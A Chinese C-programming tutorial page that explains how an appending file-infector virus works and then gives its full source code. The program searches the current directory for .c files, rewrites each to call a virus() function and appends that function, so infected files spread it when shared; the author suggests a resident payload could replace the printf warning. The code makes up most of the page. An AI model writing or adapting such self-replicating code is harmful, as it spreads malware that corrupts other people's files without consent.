c病毒程序原理分析(防范病毒 c語言小病毒示例)
病毒的特點:
病毒的最大特點就是自我復(fù)制,從病毒的分類來說有很多種,這里我們將介紹最流行的附加式
病毒,它通過對正常的文件進(jìn)行改寫,增加來實現(xiàn)其自我復(fù)制的目的。
從程序的角度來說,我們要做的事情有兩件:
1,讓程序能夠?qū)⒆约涸诓挥绊懫渌绦虮旧砉ぷ鞯那闆r下復(fù)制給其它程序,
使它具備繼續(xù)復(fù)制的能力。
2,在一定條件下使其產(chǎn)生某種發(fā)作效果。
其實第一件事情實際上可以看成對文件進(jìn)行復(fù)制,把病毒源文件的功能函數(shù)全部放到被感染
文件的最后,同時在被感染文件中調(diào)用這個函數(shù)
下面給出c語言的實現(xiàn)過程:
1,主程序調(diào)用病毒功能函數(shù)
2,病毒功能函數(shù)讀取查找同目錄下所有c文件;
3,找到一個(被感染c文件),打開它,并且將此文件全部讀取到數(shù)組變量;
4,重新創(chuàng)建一個同名文件(被感染c文件)
5,數(shù)組變量寫回這個被感染c文件,同時將病毒源文件所需要的頭文件,病毒功能函數(shù)
調(diào)用語句寫入;
6,打開病毒源文件,將病毒功能函數(shù)全部寫到被感染c文件的最后;
這樣一個簡單的c語言偽病毒virus.c就完成了
運(yùn)行程序后其內(nèi)容變化另保存為after_virus.c
此時,如果我們將1.c文件用A盤復(fù)制到其他機(jī)器或者Email給別人,結(jié)果
他們一運(yùn)行又感染了他們保存1.c文件目錄下所有c文件
對于第二件事情-------“發(fā)作效果”,這里只用printf語句警告了一下,當(dāng)然你
完全可以寫一個TSR駐留函數(shù)
其實,這個程序勉強(qiáng)可以叫做病毒
根本不算是真正的病毒,好了就說這么多,
代碼如下:
#include <stdio.h>
#include <dir.h>
void main(void)
{
virus();
}
int virus()
{
struct ffblk ffblk;
FILE *in,*out,*read;
char *virus="virus.c";
char buf[50][80];
char *p;
char *end="return";
char *bracket="}";
char *main="main";
char *include[2]={"stdio.h","dir.h"};
char *int_virus="int virus()";
char *buffer;
int done,i,j=0,flag=0;
printf("\nI have a virus. Writen by PuBin\n");
done = findfirst("*.c",&ffblk,0);
while (!done)
{
i=0;
if ((in = fopen(ffblk.ff_name, "rt"))== NULL)
{
goto next;
}
do{
if(i>=50)
{
fclose(in);
goto next;
}
p=fgets(buf[i],80,in);
i++;
}while(p!=NULL);
fclose(in);
out=fopen(ffblk.ff_name,"w+t");
fputs("#include<stdio.h>\n",out);
fputs("#include<dir.h>\n",out);
do
{
if(strstr(buf[j],main)!=NULL)
{
for(;j<i-1;j++)
if(strstr(buf[j],end)==NULL&&strstr(buf[j],bracket)==NULL)
fputs(buf[j],out);
else
{
if(flag==0)
{
flag=1;
fputs("virus();\n",out);
}
fputs(buf[j],out);
}
}
else if((strstr(buf[j],include[0])==NULL)
&&(strstr(buf[j],include[1])==NULL))
{
fputs(buf[j],out);
j++;
}
else
j++;
}while(j<i-1);
read=fopen(virus,"rt");
do
{
p=fgets(buffer,80,read);
if(strstr(buffer,int_virus))
while(p!=NULL)
{
if(strstr(buffer,virus)==NULL)
fputs(buffer,out);
else
{
fputs(" char *virus=\"",out);
fputs(ffblk.ff_name,out);
fputs("\";\n",out);
}
p=fgets(buffer,80,read);
}
}while(p!=NULL);
fclose(read);
fclose(out);
printf("\nYour c program %s has a virus. Writen by PuBin\n",ffblk.ff_name);
next: done = findnext(&ffblk);
}
return 0;
}
上一篇:C++求階乘的兩種方法
欄 目:C語言
下一篇:深入理解C語言 static、extern與指針函數(shù)
本文標(biāo)題:c病毒程序原理分析(防范病毒 c語言小病毒示例)
本文地址:http://mengdiqiu.com.cn/a1/Cyuyan/3864.html
您可能感興趣的文章
- 01-10使用OpenGL實現(xiàn)3D立體顯示的程序代碼
- 01-10基于C程序啟動代碼的深入分析
- 01-10探討:程序在內(nèi)存中的分配(常量,局部變量,全局變量,程序代碼)問
- 01-10用C++實現(xiàn)隊列的程序代碼
- 01-10C語言程序設(shè)計50例(經(jīng)典收藏)
- 01-10如何將C語言代碼轉(zhuǎn)換為應(yīng)用程序(也就是編譯)
- 01-10使用VC6.0對C語言程序進(jìn)行調(diào)試的基本手段分享
- 01-10C語言小程序 楊輝三角示例代碼
- 01-10C語言小程序 如何判斷三角型類型
- 01-10C語言小程序 數(shù)組操作示例代碼


閱讀排行
本欄相關(guān)
- 04-02c語言函數(shù)調(diào)用后清空內(nèi)存 c語言調(diào)用
- 04-02func函數(shù)+在C語言 func函數(shù)在c語言中
- 04-02c語言的正則匹配函數(shù) c語言正則表達(dá)
- 04-02c語言用函數(shù)寫分段 用c語言表示分段
- 04-02c語言中對數(shù)函數(shù)的表達(dá)式 c語言中對
- 04-02c語言編寫函數(shù)冒泡排序 c語言冒泡排
- 04-02c語言沒有round函數(shù) round c語言
- 04-02c語言分段函數(shù)怎么求 用c語言求分段
- 04-02C語言中怎么打出三角函數(shù) c語言中怎
- 04-02c語言調(diào)用函數(shù)求fibo C語言調(diào)用函數(shù)求
隨機(jī)閱讀
- 01-10delphi制作wav文件的方法
- 01-10C#中split用法實例總結(jié)
- 01-10使用C語言求解撲克牌的順子及n個骰子
- 01-11Mac OSX 打開原生自帶讀寫NTFS功能(圖文
- 04-02jquery與jsp,用jquery
- 08-05織夢dedecms什么時候用欄目交叉功能?
- 08-05DEDE織夢data目錄下的sessions文件夾有什
- 01-10SublimeText編譯C開發(fā)環(huán)境設(shè)置
- 08-05dedecms(織夢)副欄目數(shù)量限制代碼修改
- 01-11ajax實現(xiàn)頁面的局部加載